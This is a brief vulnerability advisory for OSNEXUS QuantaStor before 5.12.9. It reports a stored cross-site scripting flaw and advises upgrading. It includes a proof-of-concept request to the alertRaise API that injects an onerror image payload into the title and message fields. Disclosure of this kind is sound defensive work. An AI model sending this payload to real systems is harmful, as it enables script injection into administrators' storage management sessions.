Advisory

Upgrade to the latest version of OSNexus Quantastor;

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9. Stored Cross Site Scripting (XSS) can occur.

http://192.168.1.154/qstorapi/alertRaise?title=<img%20src=x%20onerror=alert(1)>&message=<img%20src=x%20onerror=alert(1)>&severity=1